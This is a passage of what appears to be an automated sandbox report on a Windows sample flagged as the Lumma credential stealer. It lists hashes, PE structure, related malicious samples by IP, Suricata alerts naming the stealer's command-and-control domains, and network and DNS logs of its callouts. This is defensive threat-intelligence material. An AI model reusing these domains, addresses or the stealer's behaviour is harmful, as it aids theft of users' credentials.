                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          CLOUDFLARENETUShttps://docsend.com/view/yw8rtf7gp9v6uesgGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.18.41.137
                                                                                                                                                          https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fwww.hudl.com%2Fnotifications-tracking%2Ftracker%2FBulkDownloadReady-6151bba290ef2e043c74df7a-6040b153-3f06-4375-9d9d-2976d6f1ac3e-11012597%2Femail%2Flanding%3Fforward%3Dhttps%3A%2F%2Fwww.google.com.sg%2Furl%3Fq%3Damp%2Fs%2Fhosxxrs.com%2F.drogo&data=eJxkkEGL3CAUgH-NcygY9Gl0hKZ0S2qZwy6l0_vyjCYja3RqEjL99yVLoYfeHu87vO99Q2ccBH2WmipgikqtkBrnJQUX8IxaCuHcyXcfTnP3UWnWniWEhmuGDIA1KI1yjVH-fH3--f3y8vrU91_71-fL9Xp5-fZ5fjRTKVMKzVDmT6eli3ksRLIB73FNAWuOeTrYqXZ-rZiJZG6LyYcJ39dbd1vX-0LEEwFLwO773tw2nw5IwOayxjEOuMaSF7pWHN5ingjY9zFUAvbLlt76sudU0P8I6H9TxVvuHIJhYYTApBi09KNGqphkjreCivFIIXRLjTeegtHKq5HjIALlnHFojSZgw4wxEbAJsz_OCjuWumP1RPT_a_8L0SyH4lYTEfYXET3OdwJ2IWBvZXk86vL3u8bXMpU_AQAA___Ij4KF#ask.gcr@zendesk.comGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.16.123.96
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          https://skarinbroekmanvanvliets.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.19.148.54
                                                                                                                                                          https://smolliehallpulsincoukg.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.19.148.54
                                                                                                                                                          024.xlsx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                          • 172.67.74.152
                                                                                                                                                          https://acr1-br.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          Play_VM-Now(Gracehealthmi)CLQD-68d4d7d5ab7d9dd5e551e3b0c7ea5fc5.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 104.16.79.73
                                                                                                                                                          https://mkoirelandie.blob.core.windows.net/madelinelarkin/mkoprojects.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 172.67.166.38
                                                                                                                                                          TtiLyVLw3Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.53.8
                                                                                                                                                          AKAMAI-ASUSSecuriteInfo.com.Trojan.Inject5.10240.30655.18394.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.102.49.254
                                                                                                                                                          TtiLyVLw3Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 23.64.233.20
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 23.36.242.170
                                                                                                                                                          kwVoiAAfGm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                          • 184.86.165.80
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Trojan.Inject5.10240.30655.18394.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          TtiLyVLw3Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          7hmGbJQzp5.xlamGet hashmaliciousHidden Macro 4.0Browse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          xlwings.xlamGet hashmaliciousHidden Macro 4.0Browse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          PI-4009832-2024.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          kwVoiAAfGm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204
                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 23.192.247.89
                                                                                                                                                          • 172.67.206.204

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          No created / dropped files found

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Entropy (8bit):7.947531984074342
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:file.exe
                                                                                                                                                          File size:1'863'168 bytes
                                                                                                                                                          MD5:d28a43b3dbce6278477cc5696847850a
                                                                                                                                                          SHA1:9e50e7ced4ac3ceecca11afaa981e036cd4b84cf
                                                                                                                                                          SHA256:88131cc60d069d251c658a32f17720e443fe37de43eb4b4fbae6500d6e388b5f
                                                                                                                                                          SHA512:d39399b4cb2e983afc9937c0fe65756c036d6ca64f06230562b442d20cab79b320c2696abb1379202bed8aab4c4f8408b1bf1b8107b93eded4802266a1a3efa7
                                                                                                                                                          SSDEEP:49152:VS/kbttBvUw3QGwuT2Spm7F8u6N+bsQ9/bAJ6Pt:3d3QGFSS8B8vwV9/bAJ6P
                                                                                                                                                          TLSH:F185330ECF031DB7C5962CB8E9929CDCD60E995724FE1A13CF671158180FEA6ACA2D49
                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................PJ...........@...........................J...../+....@.................................W...k..

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                          Static PE Info

                                                                                                                                                          General

                                                                                                                                                          Entrypoint:0x8a5000
                                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:6
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:6
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                          Entrypoint Preview

                                                                                                                                                          Instruction
                                                                                                                                                          jmp 00007F9F247DAE7Ah
                                                                                                                                                          cmovl ebx, dword ptr [eax+eax]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          jmp 00007F9F247DCE75h
                                                                                                                                                          add byte ptr [edi], al
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], dh
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [edi], al
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax+eax*4], cl
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          pop es
                                                                                                                                                          or al, byte ptr [eax]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al

                                                                                                                                                          Data Directories

                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                          Sections

                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                          0x10000x5d0000x25e00eb5f86f9e627fb29ea9b16ec84bcaff5False0.9994714315181518data7.981198365212424IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          0x600000x2a60000x20089a85b646df1ba1b2533d2549d1f562dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          ulxmnlbd0x3060000x19e0000x19d40028acb20f692ab051d6deca8c902718d2False0.9945931639443436data7.9532776057509755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          llihilhx0x4a40000x10000x600b233e4cd702efe3b10c81ea6c0d7c61eFalse0.5572916666666666data4.967256496433295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .taggant0x4a50000x30000x2200ca55a1cd5cfa4257538b13240b1813b3False0.06767003676470588DOS executable (COM)0.7444233342150992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                          Imports

                                                                                                                                                          DLLImport
                                                                                                                                                          kernel32.dlllstrcpy

                                                                                                                                                          Network Behavior

                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                          2024-10-11T13:45:03.908839+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.6623641.1.1.153UDP
                                                                                                                                                          2024-10-11T13:45:03.926470+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.6604711.1.1.153UDP
                                                                                                                                                          2024-10-11T13:45:04.041817+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.6531591.1.1.153UDP
                                                                                                                                                          2024-10-11T13:45:04.053227+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.6655351.1.1.153UDP
                                                                                                                                                          2024-10-11T13:45:04.167138+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.6585341.1.1.153UDP
                                                                                                                                                          2024-10-11T13:45:04.191406+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.6565381.1.1.153UDP
                                                                                                                                                          2024-10-11T13:45:04.216143+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.6544971.1.1.153UDP
                                                                                                                                                          2024-10-11T13:45:04.227670+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.6560781.1.1.153UDP
                                                                                                                                                          2024-10-11T13:45:05.369310+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64971023.192.247.89443TCP
                                                                                                                                                          2024-10-11T13:45:06.439382+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649711172.67.206.204443TCP
                                                                                                                                                          2024-10-11T13:45:06.439382+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649711172.67.206.204443TCP

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Oct 11, 2024 13:45:04.249640942 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:04.249737978 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.249851942 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:04.252989054 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:04.253026962 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.877291918 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.877376080 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:04.881038904 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:04.881062984 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.881294012 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.928015947 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:04.975400925 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.369332075 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.369353056 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.369380951 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.369400024 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.369421959 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.369436026 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.369487047 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.369518042 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.369539976 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.457576036 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.457617044 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.457717896 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.457758904 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.457813978 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.467876911 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.467905998 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.467942953 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.467955112 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.467998028 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.470638990 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.470675945 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.470700979 CEST49710443192.168.2.623.192.247.89
                                                                                                                                                          Oct 11, 2024 13:45:05.470715046 CEST4434971023.192.247.89192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.502362013 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:05.502382994 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.502476931 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:05.502820015 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:05.502830982 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.964458942 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.964649916 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:05.967284918 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:05.967298031 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.967513084 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.968717098 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:05.968733072 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:05.968775034 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:06.439380884 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:06.439476967 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:06.439547062 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:06.439766884 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:06.439791918 CEST44349711172.67.206.204192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:06.439805984 CEST49711443192.168.2.6172.67.206.204
                                                                                                                                                          Oct 11, 2024 13:45:06.439812899 CEST44349711172.67.206.204192.168.2.6

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Oct 11, 2024 13:45:03.908838987 CEST6236453192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:03.921672106 CEST53623641.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:03.926470041 CEST6047153192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:03.935458899 CEST53604711.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.041816950 CEST5315953192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:04.051970959 CEST53531591.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.053226948 CEST6553553192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:04.063097954 CEST53655351.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.167138100 CEST5853453192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:04.177642107 CEST53585341.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.191406012 CEST5653853192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:04.200674057 CEST53565381.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.216142893 CEST5449753192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:04.226700068 CEST53544971.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.227669954 CEST5607853192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:04.236187935 CEST53560781.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:04.237742901 CEST6501853192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:04.245610952 CEST53650181.1.1.1192.168.2.6
                                                                                                                                                          Oct 11, 2024 13:45:05.489314079 CEST5049553192.168.2.61.1.1.1
                                                                                                                                                          Oct 11, 2024 13:45:05.500901937 CEST53504951.1.1.1192.168.2.6

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Oct 11, 2024 13:45:03.908838987 CEST192.168.2.61.1.1.10xc036Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:03.926470041 CEST192.168.2.61.1.1.10x6a88Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.041816950 CEST192.168.2.61.1.1.10xfb77Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.053226948 CEST192.168.2.61.1.1.10x6935Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.167138100 CEST192.168.2.61.1.1.10xbcaStandard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.191406012 CEST192.168.2.61.1.1.10xcf2bStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.216142893 CEST192.168.2.61.1.1.10xfec7Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.227669954 CEST192.168.2.61.1.1.10x6a97Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.237742901 CEST192.168.2.61.1.1.10x8041Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:05.489314079 CEST192.168.2.61.1.1.10xfe7aStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Oct 11, 2024 13:45:03.921672106 CEST1.1.1.1192.168.2.60xc036Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:03.935458899 CEST1.1.1.1192.168.2.60x6a88Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.051970959 CEST1.1.1.1192.168.2.60xfb77Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.063097954 CEST1.1.1.1192.168.2.60x6935Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.177642107 CEST1.1.1.1192.168.2.60xbcaName error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Oct 11, 2024 13:45:04.200674057 CEST1.1.1.1192.168.2.60xcf2bName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
